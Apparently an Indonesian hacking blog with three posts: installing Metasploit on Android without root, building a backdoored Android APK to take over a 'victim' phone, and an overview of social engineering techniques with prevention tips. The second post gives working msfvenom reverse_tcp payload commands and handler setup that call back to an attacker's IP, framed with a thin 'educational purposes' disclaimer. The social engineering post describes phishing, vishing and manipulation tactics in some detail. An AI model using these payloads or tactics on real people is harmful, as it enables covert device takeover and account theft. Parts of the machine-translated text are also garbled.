IBX5A959F0622B93

Kamis, 30 November 2017

Cara instal Metasploit di android (Tanpa Root atau Deploy Linux

Petunjuk langkah demi langkah dan cara mudah menginstal Debain dan Metasploit di android

Jadi pada artikel ini saya akan menunjukkan kepada kalian bagaimana Anda bisa menjalankan Metasploit pada android manapun tanpa melakukan rooting dan tanpa menggunakan Kali Linux.

Seperti yang kita semua tahu bahwa menjalankan Kali Linux di android sangat rumit dan tim keamanan yang menyinggung telah mengakui masalah VNC dengan penyebarannya.

Berikut adalah screen shot dari situs resmi - 


Jadi saya telah menemukan cara alternatif untuk menjalankan alat Kali Linux di android tanpa ROOT.

Yang akan saya lakukan adalah, saya akan menjalankan Debain di android lalu menginstall Metasploit di atasnya. 

Prosesnya yang sangat sederhana, mari kita lakukan.

Apa persyaratan dari android untuk menjalankan ini ?????

Hanya Anda butuh ruang bebas 2 GB di internal SD. Itu dia.

Jika perangkat keras Anda lebih dari 1gb RAM, itu berjalan bahkan lebih halus.

Saya punya TAB cadangan dimana saya mencoba hal-hal seperti ini-


Spesifikasi perangkat keras - 

Android 4.4.2

Kernal versi 3.4.67

RAM 512mb

Porselen nya

LOL


Pertama kita akan menginstal dan menjalankan aplikasi Debain yang disebut Debain NoRoot.

Its a App yang memungkinkan Anda menjalankan Sistem Operasi Debat di ponsel Android Anda.(tanpa akar)

Ini juga tersedia di PlayStore.Cari saja Debain NoRoot.

Tapi saya akan mendownloadnya dari external link. 


Cari App di google.


Seperti yang saya katakan, juga tersedia di PlayStore.


Menemukan bagian apk yang bagus.


Biarkan saya mendownloadnya

Dalam proses 

Setelah mendownload kita harus menjalankan App ini.


Download gambar folder man


Disini saya berada di folder download untuk klik di atasnya.


Ok jadi sudah selesai, luncurkan aplikasi



Setelah membuka App, secara otomatis akan mulai mendownload file dari repetisi. Jadi Anda memerlukan koneksi internet yang baik untuk melewati ini.Aku bahkan telah melakukannya pada 2g, tidak ada kekhawatiran pasangan.

Anda dapat meminimalkan proses dan bekerja pada tab Anda secara bersamaan.



Jika Anda tidak memiliki cukup ruang di Android, Anda mungkin mendapatkan kesalahan ini. Jadi lepaskan beberapa ruang dan coba lagi. Ini tidak akan dimulai sejak awal, maka akan dilanjutkan dari tempat kesalahan ditunjukkan. Tidak perlu melakukannya sejak awal.

Jadi setelah banyak waktu dibutuhkan, tapi worth it.

Ini berarti Anda memiliki OS Debat yang berjalan di Android Anda. Dan Anda bisa menggunakan ini sebagai mesin yang sebenarnya.



Tembakan layar diambil di dalam OS Debain. Keren....

Sekarang mengapa kamu menunggu ??? Go root dan apt man ....

Ucapkan   "apt-get update" berikut dengan "apt-get upgrade"

apt-get install git

 "git clone https://github.com/MiksuLinuxGuy/metasploit-script.git".

Ubah direktori dengan: "cd metasploit-script".

Kemudian jalankan script di dalamnya: "sh metasploit-script.sh".

Ini akan mulai proses loading yang lama dan Anda perlu bersabar.

Sekarang Anda harus menutup terminal root dan membuka terminal normal.

Ubah direktori lagi dengan: "cd opt / metasploit-framework /".

Instal permata dengan: "bundle install" command.

Sekarang kamu sudah selesai!Mulai metasploit dengan "msfconsole" dan nikmati.

(Saya tidak bisa menyaringnya karena memori RAM yang rendah. Dengan RAM 500mb, Anda tidak dapat menjalankan metasploit meterpreter)


Terima kasih guys untuk membaca artikel ini Lakukan hack yang aman.

Cara Hack Android Menggunakan Metasploit

Mengapa Hack Ponsel Android?

Jadi pertanyaan pertama yang terlintas dalam pikiran kita setelah mendengar ini adalah mengapa di dunia kita ingin hack Android?Jawaban atas pertanyaan itu adalah mayoritas pengguna yang benar-benar sederhana di luar sana adalah pengguna Android dan Anda memiliki banyak korban untuk ditargetkan,               Tapi serius jangan hack perangkat siapapun tanpa izin mereka atau Anda bisa mendapat banyak masalah karena melakukan hacking android.           

Apa itu Android?

Menurut Wikipedia :
ANDROID ADALAH SYSYTEM OPERASI BERBASIS LINUX KERNEL, DAN DIRANCANG UNTUK PERANGKAT MOBILE TOUCHCREEN SEPERTI SMARTPHONE DAN KOMPUTER TABLET.
AWALNYA DIKEMBANGKAN OLEH ANDROID, INC., YANG DIDUKUNG GOOGLE SECARA FINANSIAL DAN KEMUDIAN DIBELI PADA TAHUN 2005, ANDROID DIRESMIKAN PADA TAHUN 2007 BERSAMAAN DENGAN BERDIRINYA OPEN HANDSET ALLIANCE: SEBUAH KONSORSIUM PERANGKAT KERAS, PERANGKAT LUNAK, DAN PERUSAHAAN TELEKOMUNIKASI YANG DITUJUKAN UNTUK MENINGKATKAN STANDAR TERBUKA UNTUK SELULER. PERANGKAT

Apa itu Metasploit?

Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai alat jaringan portabel yang menggunakan Perl. Pada tahun 2007, Kerangka Metasploit telah ditulis ulang secara lengkap di Ruby.
Untuk memasukkannya ke dalam kata-kata sederhana, ini adalah Kerangka Kerja Open Source, alat untuk menciptakan eksploitasibagi korban jarak jauh dan juga memiliki keseluruhan daftar eksploitasi yang tersedia di Metasploit Framework.                 Ini adalah alat favorit bagi periset keamanan dan hacker etis untuk melakukan serangan mereka. Ini sangat mudah untuk membuat muatan yang berbeda untuk Sistem Operasi dan platform yang berbeda.

Metasploit untuk Android Hacking?

Metode apa yang akan digunakan untuk hack telepon? Kita akan membuat Backdoor  dan menginstalnya pada Victim Phone.

Apa itu backdoor

Backdoor adalah metode atau cara untuk melewati otentikasi pada produk, komputer, dll. Biasanya digunakan untuk akses tidak sah ke komputer.
Untuk Android, kita akan membuat file APK dengan backdoor di dalamnya. Paket Aplikasi Android (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi ke OS Google Android. Hal ini mirip dengan paket MSI atau paket Deb pada sistem operasi berbasis Linux.

Persyaratan:-

  1. Metasploit Framework (Pra-Installed di Kali Linux)
  2. Korban Smartphone Android (Sayangnya itu adalah ponsel saya)                                                                                            

    Langkah Untuk Hack Android SmartPhone Menggunakan Metasploit:

    Jadi sekarang mari kita masuk ke dalamnya.
    1. Buka Terminal
    2. Kita akan menggunakan Metasploit Venom Framework untuk membuat exploit / backdoor untuk tutorial ini.
    3. Gunakan perintah ini untuk menghasilkan exploit / Backdoor bagi korban.
    msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk
    Buat Payload Android menggunakan msfvenom
    Izinkan saya menjelaskan Perintah di atas jadi kami menggunakan msfvenom  sebagai generator eksploitasi untuk android menggunakan Meterpreter untuk koneksi balik ke sistem penyerang. LHOST mendefinisikan alamat IP penyerang dimana dia akan mendapatkan koneksi balik dari korban. Dan sama dengan koneksi LPORTakan dilakukan pada port 4444  dan R>digunakan untuk menghasilkan executable.
    MSFVenom Payload
    Sekarang kita semua siap untuk langkah selanjutnya karena payload ini menggunakan reverse_tcp  sehingga penyerang akan mendengarkan port yang ditentukan di payload untuk koneksi balik dari korban.
    Jadi sekarang kita perlu mengatur handler untuk menangani koneksi masuk ke port mari kita lakukan.
    root@kali:~/# msfconsole
    use exploit/multi/handler set payload android/meterpreter/reverse_tcp
    
    
    Sekarang kita akan melihat koneksi terbuka, pada perangkat penyerang.
    set lhost 192.168.1.104 set lport 4444 exploit 
    
    
    Ingat bahwa LHOST & LPORT akan menjadi penyerang alamat IP dan port untuk mendengarkan koneksi balik. dan memanfaatkan untuk mulai mendengarkan.
    Sekarang segera setelah penyerang menginstall APK exploit / backdoor Anda akan mendapatkan sesi penilai balik di terminal Anda seperti ini.
    Di sini kita memiliki beberapa informasi yang telah kita ekstrak dari sistem Android sehingga ponsel korban telah sepenuhnya dimiliki.                                                      Akhirnya, sukses hack dance 😈 😈

    Jadi setelah semua ini menjelaskan apa yang telah kita pelajari tidak pernah menginstal aplikasi dari sumber yang tidak diketahui 😀 atau Anda benar-benar kacau: 3
    Akibatnya, Jika Anda masih memiliki kebingungan atau masalah apapun, Anda bisa mengecek tutorial video.
     Penting: Semua rincian yang ditampilkan dalam artikel hanya untuk tujuan pendidikan dan kami tidak bertanggung jawab atas tindakan Anda.
    Apakah Anda menyukai tutorial  Hack Smartphone Android menggunakan Metasploit? Bagikan artikel ini dengan teman Anda.

Rabu, 29 November 2017

Pengertian Lengkap Soceng (SOCIAL ENGINEERING)

adalah manipulasi psikologis  seseorang dengan tujuan untuk mendapatkan informasi tertentu atau melakukan hal tertentu dengan cara menipunya secara halus dan tidak dia sadari. manipulasi psikologis dikakukan dengan berbagai media yang tujuan nya untuk mempengaruhi pikiran korban,misalnya menggunakan suara (berbicara untuk meyakinkan korban),gambar(memasang gambar yang erotis agar di klik),tulisan  (menulis artikel yang persuasif dan meyakinkan misal menulis tutorial cara hack akun facebook,tapi palsu :D)
Dengan kata lain Social engineering adalah tehnik untuk mendapatkan informasi /hak akses dengan cara menipu korban nya dengan halus dan tanpa dia sadari. Semua kriminal 100% menggunakan tehnik ini untuk mendapatkan informasi dari korban nya. mulai dari tukang copet yang menyamar sebagai penumpang biasa, penipu yang menjanjikan hal luar biasa pada korban nya,sexpredator yang menggunakan facebook untuk berinteraksi dengan korban nya. dan lain sebagainya.

Kenapa social engineering tehnik?

Social engineering mentargetkan rantai terlemah dalam sistem keamanan komputer,yaitu user atau pengguna atau manusia itu sendiri. Bug atau celah keamanan ini bersifat universal,
tidak tergantung platform,sistem operasi,protocol,software ataupun hardware. vulnerability disetiap sistemDengan artian,semua sistem tercanggih di planet ini memiliki celah keamanan tersebut.
Tidak semua pekerjahan hacking (menjebol sistem) murni dilakaukan dari balik layar atau hanya fokus meng exploitasi mesin,karena semakin berkembang nya zaman keamanan komputer juga semakin sulit ditembus.teknik ini banyak dipake untuk penyebaran malware atau mendapatkan informasi yang diperlukan hacker,seperti identitas seseorang.
Untuk mendapatkan sebuah akses ke sebuah sistem (komputer,gedung,relasi,komunitas,rasa percaya kita) bisa dilakukan dengan melakukan pendekatan dengan manusia itu sendiri untuk mendapatkan kepercayaan agar pelaku social engineer  bisa melakukan apa yang dia inginkan tanpa korban sadari. ketika sadar itu sudah sangat terlambat. jadi yang disebut sistem disini bukan hanya komputer tetapi bisa juga pikiran kita sendiri,keamanan sebuah gedung,sebuah kommunitas dll.
Social engineering tehnik tidak hanya dilakukan oleh kriminal, tetapi polisi/penegak hukum juga menggunakan tehnik ini untuk memata-matai target operasi dan  mendapatkan informasi tentang target operasi.

9 Jenis Social engineering tehnik yang populer

  • Reverse social engineering (RSE)

    Tehnik ini dilakukan dengan 3 langkah yaitu:
    -Merusak
    pertama-tama hacker akan berusaha melakukan pengrusakan terhadap infrastruktur network yang ada sehingga kinerja system akan terganggu dan tidak berjalan sebagaimana mestinya,secara otomatis pemilik system akan berusaha mencari informasi untuk memperbaiki hal ini.
    -Memasang Iklan
    Iklan bisa dikirim ke alamat email pemilik sistem yang sebelum nya sender nya sudah di spoof seolah-olah email berasal dari perusahaan security terpercaya, atau bisa dilakukan dengan memberikan  kartunama sebelum serangan dimulai agar ketika hacker mengacaukan sistem si korban akan menghubungi si hacker yang sebelum nya memberikan kartunama /iklan dalam bentuk email
    -Membantu
    Setelah korban melihat iklan dan mengontak teknisi untuk perbaikan sistem (yang sebenarnya adalah si hacker itu sendiri) alih-alih membantu malah si hacker sudah mendapat akses penuh ke sistem dan bisa melakukan hal yang berbahaya seperti menanam backdoor ke sistem,mengambil data rahasia dll
    Tehnik ini sering kita lihat di filem-filem box office. dimana pemeran utama menyamar menjadi teknisi atau IT konsultan untuk bisa mengakses perangkat secara fisik/remote dan menanam backdoor.
  • PiggyBack Ride

    singkatnya tehnik ini menggunakan seseorang yang memiliki akses /wewenang agar kita mendapat hak akses seperti halnya orang tersebut.
    Contohnya: kita berjalan dibelakang orang yang memiliki akses ke sebuah gedung,begitu orang tersebut membuka pintu dengan security key yang dimilikinya kita ngikut masuk dibelakang nya. contoh lain seperti ketika hujan lebat kita sengaja membawa banyak barang /membawa kotak di kiri dan kanan kemudian dengan sopan kita meminta tolong seseorang yang ada di sekitar yang memiliki akses untuk membukakan pintu dengan alasan security key yang kita miliki susah diambil karena ada di kantong /tas /lupa di taruh di dalam kotak .dll
  • Techie Talk (berbicara layaknya ahli)

    Kebanyakan hacker sangat mahir dalam hal teknis, ketika hacker akan meakukan social engineering maka si hacker dapat berbicara lancar seperti ahli soal komputer untuk mendapatkan kepercayaan dai si korban.
    contohnya ketika hacker berpura-pura dari  bagian helpdesk dan memberitahukan kepada korban nya bahwa sistem nya telah diretas dan si korban harus mengganti password baru ,maka si hacker akan memandu korban nya untuk mengganti password dan menanyakan password apa yang akan digunakan untuk memastikan password yang dipilih korban aman. nah loo.. secara gak langsung si hacker dapet password baru dari si korban.
  • Phishing Attack (Scamming)

    tehnik phising atau scaming merupakan tehnik untuk mendapatkan informasi sensitif(Data pribadi atau akun ) dari korban dengan cara menulis email yang seolah-olah berasal dari website resmi seperti paypal , biasanya dalah email nya akan tertulis untuk mengkonfirmaasi meng update data paypal dan mengganti password paypal karena akun yang korban miliki disinyalir telah disalahgunakan orang dan disertakan link yang menuju ke website mirip100% seperti paypal yang sebenarnya website tersebut adalah biatan dari si hacker itu sendiri. dengan cara ini hacker mendapatkan semua data yang diperlukan untuk mengambil alaih akun seseorang. teknik ini bisa dikembangkan labih lanjut untuk mendapatkan sasaran tertarget atau yang bisa dikenal dengan spear phishing attack
    selain email ,tehnik ini juga menggunakan media social media seperti facebook untuk mendapatkan korban nya.
  • Whalling attack (Memancing Paus )

    whalling attack menargetkan korban dengan profile tinggai atau orang-orang penting dalam bidang yang digelutinya. sebagai contoh : hacker bisa mendapat informasi penting seperti kartu kredit dan data pribadi lain nya dengan cara menggali informasi yang dipajang korban secara online. semisal,di dalam facebook page nya tertulis bahwa korban alumni universitas A dengan hobby golf, maka si hacker bisa membuat scam email yang seolah-olah resmi dikirim  dari universitas A yang isinya ajakan untuk mengikuti turnamen golf antar alumni danmeminta untuk mengisi formulir yang telah disediakan sebagai syarat mengikuti turnamen tersebut. nah formulir yang disediakan adalah data  pribadi yang harus diisi , dengan mengumpulkan data pribadi sepotong demi sepotong,si hacker bisa mendapat 100% data pribadi dari korban.
  • Vishing attack (Voice or VoIP Phishing attack)                                                                                                                              gagal dengan tehnik phishing atau whaling ? cobalah dengan tehnik vishing , dimana dalam tehnik ini menggunakan telephone utnuk mendapatkan informasi dari si kotban. hacker bisa berpura-pura menjadi karyawan bank dan memberitahukan bahwa kartu kreditnya ada masalah dan perlu mengupdate data-data lama dengan yang baru. dalam percakapan nya korban secara tidak sadar akan ditanyakan nomer CC dan pin serta identitas diri.
  • Social (Engineer) Networking                                                                                  media social seperti facebook,twitter,instagram dll menjadi surga bagi social engineer, di sini sebagian besar orang mengexpose data pribadinya seperti tempat tanggal lahir ,hobi,tempat tinggal,relasi,dll . social engineer bisa mendapat kepercayaan dengan menjalin pertemanan dengan korban dan mendapatkan kepercayaan. setelah terjalin kepercayaan hacker bisa menyalahgunakan kepercayaan yang telah diberikan oleh korban untuk hal yang merugikan korban.
  • Neuro-linguistic programming (NLP)                                                                        social engineer yang baik harus memiliki pemahaman yang kuat untuk memanipulasi pikiran manusia            Neuro-linguistik pemrograman (NLP) adalah salah satu alat psikologis yang digunakan oleh para social engineer untuk memanipulasi korban dan jika dilakukan dengan benar hasilnya luar biasa.NLP berkaitan dengan bagaimana seseorang mendapat kepercayaan dengan cara berkomunikasi (verbal atau non verbal).                                              Sebagai contoh ketika seorang social engineer malancarkan aksinya dia akan berhati-hati dalam memilih kata-tata,mengatur intonasi nafas,nada suara dan gestur tubuhnya. hal ini akan membantu menjalin kepercayaan seseorang di level bawah sadar, korban akan hormat/mengagumi si pembicara. setelah terjalin rasa percara bisa dilanjut ke tahap selanjutnya seperti memberi senyuman hangat dan ringan,menyentuh bahu atau lengan mereka untuk memberikan rasa aman dan menggunakan kata-kata yang menunjukkan pikiran positif, gambar, dan emosi. Semua gesture, visual, dan tindakan verbal(disebut anchoring dan reframing dalam hal NLP) memberikan pesan bawah sadar yang mempengaruhi orang untuk memiliki perasaan positif dan memperoleh rasa hubungan dengan pelaku social engineering . kalau hubungan sudah terjalin dengan kuat,sugesti kuat pelaku social engineering akan bisa mengarahkan korban nya untuk melakukan hal yang menguntungkan pelaku.
  • Sex Sells                                                                                                                               satu fakta tentang semua orang, dimana orang akan mau melakukan hal bodoh jika sudah tertarik dengan seseorang (jatuh cinta) tapi dalam kontek artikel ini yang dimaksud adalah membuat orang tertarik (mengidolakan,menganggap kita suhu/guru/mentor) dengan kita agar korban percaya dan tanpa sadar bisa kita kendalikan untuk melakukan hal yang kita inginkan di luar dunia computer security Tehnik ini banyak sekali digunakan oleh cewek matre untuk ndapetin duid om om 😀 dan cabe-cabean kwkwkw.                                     Tehnik ini juga digunakan oleh penyebar kepercayaan/agama dalam menyerbarluaskan kepercayaan nya atau agamanya.
  • Tujuan penggunaan social engineering tehnik

    Dalam dunia keamanan komputer,tehnik ini dipakai jika sebuah sistem komputer tidak mungkin ditembus dengan cara mengexploitasi secara teknis (meng exploitasi komputer), dengan memanfaatkan kelemahan manusia seorang hacker bisa memancing pengguna komputer untuk memasang backdoor/malware tanpa korban sadari dengan tehnik social engineering . cara ini dilakukan dengan metode pendekatan secara psikologi, kreatifitas menjadi kuncu utama dari social engineering.
    ada banyak cara menyisipkan Backdoor /malware agar tidak terlihat oleh korban . misalnya menyisipkan exploit ke dalam file dokumen ,menyisipkan backdoor kedalam aplikasi yang terlihat resmi, menyisipkan exploit pada flashdisk yang dijatuhkan di dekat lokasi target (begitu ada yang nemu biasanya pnasaran untuk colok ke komputer) dan masih banyak lagi karena bergantung bagaimana hacker berimprovisasi dengan di korban.

    Contoh implementasi social engineering tehnik

    berikut adalah contoh penggunaan social engineering tehnik yang bisa kita jumpai ketika kita menggunakan internet dan dalam kehidupan sehari-hari
    • Menyebarkan Malware menggunakan program bajakan

      malware dalam aplikasi bajakanHacker (pembuat malware) akan menyisipkan kode jahatnya (malware)pada aplikasi bajakan yang telah dicrack , dengan begitu si korban tidak akan sadar.karena korban mendapatkan apa yang diinginkan nya (Software berbayar yang gratis /telah di crack) tetapi si hacker juga mendapatkan apa yang dia dia inginkan,yaitu tanpa sadar si korban telah menginstal backdoor/trojan kedalam sistemnya dan si hacker mempunyai hak penuh akan komputer si korban(victim).
    • Menyebarkan malware dan membajak facebook account lewat gambar porno (Phishing)

      • memancing-dengan-gambar-sexyLPernah liat orang posting gambar-gambar porno di grup? atau muncul auto like gak jelas di komen status kita? account orang yang memposting gambar porno tersebut telah dibajak,ini bermula ketika korban melihatpostingan gambar porno di grup kemudian dia meng klik tautan tersebut,sebelum masuk ke website porno biasanya akan ditanyakan atau disuruh verifikasi kalo sudah 18+ dengan cara mengisikan username dan password facebook. nah disinilah kenapa account facebook bisa dibajak. karena korban tanpa sadar telah mengetikan facebook account di situs lain (website yang dibuat hacker) dengan kata lain korban telah menyerahkan facebook account dengan sukarela. setelah facebook account didapatkan maka selanjutkan account tersebut akan digunakan botnet untuk memposting gambar porno ke grup lain.
      • Menyebarkan Malware dengan fake alert(peringatan palsu)

        disuruh menginstall codec palsuKetika korban (victim) sedang browsing atau sedang mencari video-vedo gak jelas (video dewasa B*k**p) kemudian di websitenya tertulis, “your codec not instaled pls install 1st to view this video” ketika si korban melihat hal tersebut pasti akan mendownload kodek palsu tersebut dan menginstall nya,si korban juga tak curiga karena korban bisa menonton apa yang dia inginkan setelah menginstal codec palsu yang ternyata malware.
      • Mendapatkan data pribadi dengan Spam email

        mengirim spamm emailPernah mendapat email gak jelas yang isinya menang undian atau liburan dan disuruh mengisi data pribadi dan mengupload bukti diri,yakin lah ini semua adalah palsu.dan si hacker hanya menginginkan data pribadi korban yang nantinya akan dia gunakan untuk menutupi jati dirinya dalam melakukan aksi kejahatan di dunia maya.
      • Menipu pengguna telefon dengan memberitahukan menang undian

        menang-undianPernah mendapat sms menang undian?karena kamu da tau itu penipuan jadi kamu diemin,tapi bayangkan ada berjuta2 sms yang dikirim scammer ke nomer acak. dari sejuta nomer pasti ada seratus yang bisa kena tipu dan percaya. orang yang percaya biasanya orang yang gaptek,dengan mudahnya mereka dipengaruhi oleh scammer dan dituntun sampai ke atm dengan instruksi yang meyakinkan dengan mengatasnamakan dari bank sampai akhirnya malah korban yang mentrasfer duit ke scammer,karena biasnaya disuruh memilih menu dalam bahasa inggris di ATM.
      • Mendapatkan account game dengan menyebarkan cheat /hack dan phising.

        Hello gamers ,jdi gamer harus gaul juga karena tidak tertutup kemungkinan account game online mu jadi sasaran hacker. Karena game online memiliki nilai ekonomi di dunia nyata,banyak gamer yang memerlukan game item /game currency secara instan dengan cara membeli dari player lain dengan uang beneran. Metode yang paling sering digunakan diantaranya:

        mendapatkan akun game dengan cara phising

        Yakinlah walau kamu da sering banget main bareng dia,jangan pernah mau pinjem –pinjeman character, karena account ibarat sebuah celana dalam,itu adalah privacy yang gak boleh dipinjem pinjemin. Bisa-bisa setelah dipinjemin charactermu bakalan telanjang bulat.

         -Mendownlod cheat /hack game

        Jalan pintas yang menggiurkan adalah cheat, dimana kita membayangkan bakal bisa dapet gold dengan mudah menggunakan cheat, tetapi dibalik iming-iming benefit menggunakan cheat kamu juga telah menginstall keylogger bahkan trojan yang akan menyadap account game mu.

         -Phishing website event

        Phising adalah teknik social engineering dengan cara membuat tampilan website /program sama persis seperti aslinya untuk mendapatkan data pribadi korban.
        Pernah mendapat email atua mailbox ingame yang isinya  “account mu mau di blok karena melakukan tindakan ilegal,dan disuruh konfirmasi data game di  website yang diberikan ”. yakinlah. Pihak provider game atau staff resmi tidak akan menanyakan account  dari pelanggan nya. Untuk menghindari tehnik ini adalah dengan selalu memperhatikan URL website dan hafalkan URL dari website resmi dari tiap game.                                            Pinjem karakter / sharing account dengan teman in game.

      Cara pencegahan social engineering tehnik

      Agar kita tidak menjadi korban dengan tehnik semacam ini, ada hal mudah yang perlu kamu ketahui dan bisa menjadi pedoman.
      • Jangan mudah percaya dan bersihkan pikiran porno

        Jika kamu benar-benar tidak tau tentang internet,minimal bersihkan pikiran mu dari “Pornografi” karena kebanyakan hacker menggunakan gambar porno untuk memancing korban nya agar ngeklik dan menuntunnya untuk mendownload aplikasi berbahaya(malware). jika kamu maniak pengguna social media,jangan mudah percaya akan gambar profile yang cakep,lalu menjalin hubungan,berbagi informasi pribadi lalu ketemuan membersihkan-pikiranditempat yang jauh (anak dibawah umur dan wanita rawan menjadi korba
        n dengan cara ini)
      • Berfikir sehat dan relevan

        jika kamu tiba-tiba mendapat email,telefon,pesan singkat telah memenagkan hadiah dan kamu tidak merasa mengikuti hal hal seperti itu,maka jangan tanggepin. atau pas kebetulan kamu menabung di bank dan mendapat sms menang undian dari bank tersebut maka jangan langsung percaya, apa lagi nomer yang digunakan adalah nomer pribadi. dan satu lagi ketika mendapat telfon yang mengatasnamakan bank dan meminta data-data pribadi jangan pernah dikasih. karena data pribadi tidak pernah ditanyakan lewat telefon untuk alasan apapun. ngomong aja akan diantar ke bank langsung datanya jika memang diperlukan.
      • Jangan selalu berpikir maunya instan dan gratis

        (semua ada harga yang harus dibayar)
        Kelemahan ini sering dipakai hacker atau penipu untuk meyakinkan korban nya, misalnya investasi bodong dengan bunga 20%sebulan,awal-awal emang jalan ,dibilan ke 3-4 dia bawa kabur smua duid.                                                  Nah ketika kita membutuhkan aplikasi premium tapi gak mau beli,da disediakan aplikasi bajakan dan disediakan crack/key generator,tapi tanpa kamu ketahui ada bahaya yang mengancam para pengguna aplikasi bajakan                                                  untuk para gamers,kadang ingin jalan singkat dengan menggunakan cheat ,bot  untuk mempermudah dalam bermain game nya. tetapi tanpa disadari cheat atau bot yang didapatkan nya secara gratis telah disisipi malware. dan akhirnya akun nya yang dirampok/dihack. jangan terlalu percaya dengan orang yang kita anggap dekat di dunia maya.    Boleh berteman di dunia maya,tapi tau akan batasan . jangan sampai kamu anggap teman di dunia maya adalah segalanya. memang tidak semua orang berhati busuk,tapi gak semua orang berhati baik walau kelihatan baik.selalu waspada dengna orang jahat yang memanfaatkan kerpercayaan yang kita berikan.

Daftar Blog Saya